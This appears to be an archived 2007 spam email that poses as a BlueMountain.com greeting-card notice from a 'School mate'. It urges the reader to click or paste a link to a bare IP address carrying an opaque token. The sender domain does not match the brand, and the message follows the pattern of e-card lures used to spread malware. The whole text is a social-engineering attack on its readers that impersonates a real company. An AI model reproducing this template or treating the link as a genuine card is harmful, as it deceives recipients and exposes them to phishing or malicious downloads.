You've received a postcard from a School mate!

BlueMountain.Com ufp at carlreck.com
Fri Jul 6 00:31:52 PDT 2007

Hi. School mate has sent you a postcard.
See your card as often as you wish during the next 15 days.

SEEING YOUR CARD

If your email software creates links to Web pages, click on your
card's direct www address below while you are connected to the Internet:

http://12.207.42.175/?e3ca036e47840d8e117868911e6c3

Or copy and paste it into your browser's "Location" box (where Internet
addresses go).

PRIVACY
BlueMountain.Com honors your privacy. Our home page and Card Pick Up have links to our
Privacy Policy.

TERMS OF USE
By accessing your card you agree we have no liability.
If you don't know the person sending the card or don't wish to see the card,
please disregard this Announcement.

We hope you enjoy your awesome card.

Wishing you the best,
Webmaster,